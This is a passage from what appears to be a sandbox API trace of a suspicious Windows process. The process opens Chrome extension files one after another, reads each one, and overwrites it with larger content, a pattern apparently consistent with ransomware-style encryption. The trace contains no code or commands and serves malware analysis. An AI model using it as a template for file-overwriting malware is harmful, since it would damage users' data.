lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.531] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eea208, nNumberOfBytesToRead=0xff, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea208*, lpNumberOfBytesRead=0x311f2bc*=0xff, lpOverlapped=0x0) returned 1 [0167.532] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.532] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d1ab18*, nNumberOfBytesToWrite=0x687, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab18*, lpNumberOfBytesWritten=0x311f2d0*=0x687, lpOverlapped=0x0) returned 1 [0167.533] CloseHandle (hObject=0x1d8) returned 1 [0167.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.534] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.534] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc8 [0167.534] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.534] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.534] ReleaseMutex (hMutex=0x168) returned 1 [0167.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.535] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xc8, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x311f2bc*=0xc8, lpOverlapped=0x0) returned 1 [0167.536] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.536] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x650, lpOverlapped=0x0) returned 1 [0167.536] CloseHandle (hObject=0x1d8) returned 1 [0167.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.538] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.538] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x165 [0167.538] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.538] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.538] ReleaseMutex (hMutex=0x168) returned 1 [0167.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.539] ReadFile (in: hFile=0x1d8, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x165, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x311f2bc*=0x165, lpOverlapped=0x0) returned 1 [0167.540] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.540] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d1ab18*, nNumberOfBytesToWrite=0x6ed, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab18*, lpNumberOfBytesWritten=0x311f2d0*=0x6ed, lpOverlapped=0x0) returned 1 [0167.540] CloseHandle (hObject=0x1d8) returned 1 [0167.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.541] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.541] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c3 [0167.542] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.542] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.542] ReleaseMutex (hMutex=0x168) returned 1 [0167.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.542] ReadFile (in: hFile=0x1d8, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1c3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x311f2bc*=0x1c3, lpOverlapped=0x0) returned 1 [0167.544] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.544] WriteFile (in: hFile=0x1d8, lpBuffer=0x2873108*, nNumberOfBytesToWrite=0x74b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2873108*, lpNumberOfBytesWritten=0x311f2d0*=0x74b, lpOverlapped=0x0) returned 1 [0167.544] CloseHandle (hObject=0x1d8) returned 1 [0167.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.545] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.546] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc6 [0167.546] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.546] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.546] ReleaseMutex (hMutex=0x168) returned 1 [0167.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.547] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x311f2bc*=0xc6, lpOverlapped=0x0) returned 1 [0167.548] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.548] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x64e, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x64e, lpOverlapped=0x0) returned 1 [0167.548] CloseHandle (hObject=0x1d8) returned 1 [0167.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.550] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.550] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc4 [0167.550] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.550] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.550] ReleaseMutex (hMutex=0x168) returned 1 [0167.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.551] ReadFile (in: hFile=0x1d8, lpBuffer=0x26a0578, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a0578*, lpNumberOfBytesRead=0x311f2bc*=0xc4, lpOverlapped=0x0) returned 1 [0167.552] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.552] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x64c, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x64c, lpOverlapped=0x0) returned 1 [0167.552] CloseHandle (hObject=0x1d8) returned 1 [0167.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.554] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.554] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb0 [0167.554] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.554] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.554] ReleaseMutex (hMutex=0x168) returned 1 [0167.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.555] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x311f2bc*=0xb0, lpOverlapped=0x0) returned 1 [0167.556] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.556] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x638, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x638, lpOverlapped=0x0) returned 1 [0167.556] CloseHandle (hObject=0x1d8) returned 1 [0167.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6cd [0168.432] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.432] ReleaseMutex (hMutex=0x168) returned 1 [0168.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_window.css", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0168.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_window.css", cchWideChar=15, lpMultiByteStr=0x1f7352c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="craw_window.css", lpUsedDefaultChar=0x0) returned 15 [0168.432] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x6cd, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x311f2bc*=0x6cd, lpOverlapped=0x0) returned 1 [0168.442] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.442] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xc55, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f2d0*=0xc55, lpOverlapped=0x0) returned 1 [0168.442] CloseHandle (hObject=0x1d8) returned 1 [0168.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.443] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.443] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa6 [0168.444] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.444] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.444] ReleaseMutex (hMutex=0x168) returned 1 [0168.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_maximize.png", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0168.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_maximize.png", cchWideChar=35, lpMultiByteStr=0x1fa54dc, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="topbar_floating_button_maximize.png", lpUsedDefaultChar=0x0) returned 35 [0168.444] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xa6, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x311f2bc*=0xa6, lpOverlapped=0x0) returned 1 [0168.445] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.445] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x62e, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x62e, lpOverlapped=0x0) returned 1 [0168.446] CloseHandle (hObject=0x1d8) returned 1 [0168.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.447] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.448] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x36b [0168.448] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.448] ReleaseMutex (hMutex=0x168) returned 1 [0168.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.448] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x36b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x311f2bc*=0x36b, lpOverlapped=0x0) returned 1 [0168.461] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.461] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x8f3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x8f3, lpOverlapped=0x0) returned 1 [0168.461] CloseHandle (hObject=0x1d8) returned 1 [0168.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2c4 [0168.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.462] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.462] ReleaseMutex (hMutex=0x168) returned 1 [0168.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, 